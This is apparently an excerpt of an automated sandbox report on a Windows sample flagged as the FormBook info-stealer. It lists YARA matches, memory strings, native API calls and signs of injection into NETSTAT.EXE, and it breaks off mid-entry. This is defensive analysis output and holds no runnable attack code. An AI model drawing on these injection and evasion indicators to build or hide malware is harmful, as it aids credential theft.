Source: explorer.exe, 00000003.00000000.270914396.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000003.00000000.270914396.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000003.00000000.270914396.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000003.00000000.270914396.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000003.00000000.270914396.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000003.00000000.270914396.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000003.00000000.270914396.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: in.exe, 00000000.00000002.241150874.0000000002536000.00000004.00000001.sdmp	String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000008.00000002.500616903.00000000034C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.285496471.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.285906705.0000000001100000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.498508989.0000000001020000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.241660849.00000000034E9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.285926507.0000000001130000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.500429696.0000000003490000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 2.2.in.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.in.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000008.00000002.500616903.00000000034C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.500616903.00000000034C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.285496471.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.285496471.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.285906705.0000000001100000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.285906705.0000000001100000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.498508989.0000000001020000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.498508989.0000000001020000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.241660849.00000000034E9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.241660849.00000000034E9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.285926507.0000000001130000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.285926507.0000000001130000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.500429696.0000000003490000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.500429696.0000000003490000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.in.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.in.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.in.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.in.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_004181B0 NtCreateFile,	2_2_004181B0
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_00418260 NtReadFile,	2_2_00418260
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_004182E0 NtClose,	2_2_004182E0
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_00418390 NtAllocateVirtualMemory,	2_2_00418390
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_004181AC NtCreateFile,	2_2_004181AC
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_004182DA NtClose,	2_2_004182DA
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0041838A NtAllocateVirtualMemory,	2_2_0041838A
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01289910 NtAdjustPrivilegesToken,LdrInitializeThunk,	2_2_01289910
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012899A0 NtCreateSection,LdrInitializeThunk,	2_2_012899A0
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01289860 NtQuerySystemInformation,LdrInitializeThunk,	2_2_01289860
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01289840 NtDelayExecution,LdrInitializeThunk,	2_2_01289840
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012898F0 NtReadVirtualMemory,LdrInitializeThunk,	2_2_012898F0
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01289A20 NtResumeThread,LdrInitializeThunk,	2_2_01289A20
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01289A00 NtProtectVirtualMemory,LdrInitializeThunk,	2_2_01289A00
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01289A50 NtCreateFile,LdrInitializeThunk,	2_2_01289A50
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01289540 NtReadFile,LdrInitializeThunk,	2_2_01289540
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012895D0 NtClose,LdrInitializeThunk,	2_2_012895D0
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01289710 NtQueryInformationToken,LdrInitializeThunk,	2_2_01289710
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012897A0 NtUnmapViewOfSection,LdrInitializeThunk,	2_2_012897A0
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01289780 NtMapViewOfSection,LdrInitializeThunk,	2_2_01289780
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01289FE0 NtCreateMutant,LdrInitializeThunk,	2_2_01289FE0
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01289660 NtAllocateVirtualMemory,LdrInitializeThunk,	2_2_01289660
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012896E0 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_012896E0
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01289950 NtQueueApcThread,	2_2_01289950
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012899D0 NtCreateProcessEx,	2_2_012899D0
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01289820 NtEnumerateKey,	2_2_01289820
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0128B040 NtSuspendThread,	2_2_0128B040
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012898A0 NtWriteVirtualMemory,	2_2_012898A0
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01289B00 NtSetValueKey,	2_2_01289B00
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0128A3B0 NtGetContextThread,	2_2_0128A3B0
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01289A10 NtQuerySection,	2_2_01289A10
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01289A80 NtOpenDirectoryObject,	2_2_01289A80
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01289520 NtWaitForSingleObject,	2_2_01289520
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0128AD30 NtSetContextThread,	2_2_0128AD30
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01289560 NtWriteFile,	2_2_01289560
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012895F0 NtQueryInformationFile,	2_2_012895F0
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01289730 NtQueryVirtualMemory,	2_2_01289730
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0128A710 NtOpenProcessToken,	2_2_0128A710
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01289760 NtOpenProcess,	2_2_01289760
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0128A770 NtOpenThread,	2_2_0128A770
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01289770 NtSetInformationFile,	2_2_01289770
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01289610 NtEnumerateValueKey,	2_2_01289610
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01289670 NtQueryInformationProcess,	2_2_01289670
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01289650 NtQueryValueKey,	2_2_01289650
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012896D0 NtCreateKey,	2_2_012896D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038D9780 NtMapViewOfSection,LdrInitializeThunk,	8_2_038D9780
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038D9FE0 NtCreateMutant,LdrInitializeThunk,	8_2_038D9FE0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038D9710 NtQueryInformationToken,LdrInitializeThunk,	8_2_038D9710
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038D96D0 NtCreateKey,LdrInitializeThunk,	8_2_038D96D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038D96E0 NtFreeVirtualMemory,LdrInitializeThunk,	8_2_038D96E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038D9A50 NtCreateFile,LdrInitializeThunk,	8_2_038D9A50
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038D9650 NtQueryValueKey,LdrInitializeThunk,	8_2_038D9650
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038D9660 NtAllocateVirtualMemory,LdrInitializeThunk,	8_2_038D9660
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038D99A0 NtCreateSection,LdrInitializeThunk,	8_2_038D99A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038D95D0 NtClose,LdrInitializeThunk,	8_2_038D95D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038D9910 NtAdjustPrivilegesToken,LdrInitializeThunk,	8_2_038D9910
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038D9540 NtReadFile,LdrInitializeThunk,	8_2_038D9540
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038D9840 NtDelayExecution,LdrInitializeThunk,	8_2_038D9840
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038D9860 NtQuerySystemInformation,LdrInitializeThunk,	8_2_038D9860
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038D97A0 NtUnmapViewOfSection,	8_2_038D97A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038DA3B0 NtGetContextThread,	8_2_038DA3B0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038D9B00 NtSetValueKey,	8_2_038D9B00
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038DA710 NtOpenProcessToken,	8_2_038DA710
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038D9730 NtQueryVirtualMemory,	8_2_038D9730
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038D9760 NtOpenProcess,	8_2_038D9760
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038D9770 NtSetInformationFile,	8_2_038D9770
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038DA770 NtOpenThread,	8_2_038DA770
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038D9A80 NtOpenDirectoryObject,	8_2_038D9A80
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038D9A00 NtProtectVirtualMemory,	8_2_038D9A00
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038D9610 NtEnumerateValueKey,	8_2_038D9610
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038D9A10 NtQuerySection,	8_2_038D9A10
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038D9A20 NtResumeThread,	8_2_038D9A20
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038D9670 NtQueryInformationProcess,	8_2_038D9670
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038D99D0 NtCreateProcessEx,	8_2_038D99D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038D95F0 NtQueryInformationFile,	8_2_038D95F0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038D9520 NtWaitForSingleObject,	8_2_038D9520
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038DAD30 NtSetContextThread,	8_2_038DAD30
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038D9950 NtQueueApcThread,	8_2_038D9950
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038D9560 NtWriteFile,	8_2_038D9560
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038D98A0 NtWriteVirtualMemory,	8_2_038D98A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038D98F0 NtReadVirtualMemory,	8_2_038D98F0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038D9820 NtEnumerateKey,	8_2_038D9820
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038DB040 NtSuspendThread,	8_2_038DB040
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_010381B0 NtCreateFile,	8_2_010381B0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_01038390 NtAllocateVirtualMemory,	8_2_01038390
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_01038260 NtReadFile,	8_2_01038260
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_010382E0 NtClose,	8_2_010382E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_010381AC NtCreateFile,	8_2_010381AC
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0103838A NtAllocateVirtualMemory,	8_2_0103838A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_010382DA NtClose,	8_2_010382DA

Source: C:\Users\user\Desktop\in.exe	Code function: 0_2_0233C2B0	0_2_0233C2B0
Source: C:\Users\user\Desktop\in.exe	Code function: 0_2_02339968	0_2_02339968
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_00401030	2_2_00401030
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_00401177	2_2_00401177
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_00408C4B	2_2_00408C4B
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_00408C50	2_2_00408C50
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0041B496	2_2_0041B496
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0041C504	2_2_0041C504
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0041B5E0	2_2_0041B5E0
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_00402D87	2_2_00402D87
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_00402D90	2_2_00402D90
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0041BE43	2_2_0041BE43
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0041B67E	2_2_0041B67E
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0041BFF0	2_2_0041BFF0
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0041B785	2_2_0041B785
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_00402FB0	2_2_00402FB0
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01264120	2_2_01264120
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0124F900	2_2_0124F900
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0131E824	2_2_0131E824
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01301002	2_2_01301002
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012720A0	2_2_012720A0
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_013120A8	2_2_013120A8
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0125B090	2_2_0125B090
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_013128EC	2_2_013128EC
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01312B28	2_2_01312B28
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0127EBB0	2_2_0127EBB0
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0130DBD2	2_2_0130DBD2
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_013003DA	2_2_013003DA
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_013122AE	2_2_013122AE
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01240D20	2_2_01240D20
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01312D07	2_2_01312D07
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01311D55	2_2_01311D55
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01272581	2_2_01272581
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0125D5E0	2_2_0125D5E0
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_013125DD	2_2_013125DD
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0125841F	2_2_0125841F
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0130D466	2_2_0130D466
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01311FF1	2_2_01311FF1
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0131DFCE	2_2_0131DFCE
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01266E30	2_2_01266E30
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0130D616	2_2_0130D616
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01312EF7	2_2_01312EF7
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038CEBB0	8_2_038CEBB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038B6E30	8_2_038B6E30
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0389F900	8_2_0389F900
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_03890D20	8_2_03890D20
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038B4120	8_2_038B4120
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_03961D55	8_2_03961D55
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038AB090	8_2_038AB090
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_03951002	8_2_03951002
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0103C504	8_2_0103C504
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_01022D87	8_2_01022D87
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_01022D90	8_2_01022D90
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0103B5E0	8_2_0103B5E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_01028C4B	8_2_01028C4B
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_01028C50	8_2_01028C50
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0103B496	8_2_0103B496
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0103B785	8_2_0103B785
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_01022FB0	8_2_01022FB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0103BE43	8_2_0103BE43
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0103B67E	8_2_0103B67E

Source: C:\Users\user\Desktop\in.exe

Code function: String function: 0124B150 appears 45 times

Source: in.exe	Binary or memory string: OriginalFilename vs in.exe
Source: in.exe, 00000000.00000002.241089375.00000000024E1000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSimpleUI.dll( vs in.exe
Source: in.exe, 00000000.00000002.241660849.00000000034E9000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameDSASignature.dll@ vs in.exe
Source: in.exe, 00000000.00000000.232546198.0000000000042000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameClientWellKnownEntry.exe0 vs in.exe
Source: in.exe	Binary or memory string: OriginalFilename vs in.exe
Source: in.exe, 00000002.00000002.285570782.00000000006A2000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameClientWellKnownEntry.exe0 vs in.exe
Source: in.exe, 00000002.00000002.286080547.000000000133F000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs in.exe
Source: in.exe, 00000002.00000002.285944809.0000000001160000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamenetstat.exej% vs in.exe
Source: in.exe	Binary or memory string: OriginalFilenameClientWellKnownEntry.exe0 vs in.exe

Source: in.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 00000008.00000002.500616903.00000000034C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.500616903.00000000034C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.285496471.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.285496471.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.285906705.0000000001100000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.285906705.0000000001100000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.498508989.0000000001020000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.498508989.0000000001020000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.241660849.00000000034E9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.241660849.00000000034E9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.285926507.0000000001130000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.285926507.0000000001130000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.500429696.0000000003490000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.500429696.0000000003490000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.in.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.in.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.in.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.in.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: in.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/1@10/4

Source: C:\Users\user\Desktop\in.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\in.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6036:120:WilError_01

Source: in.exe

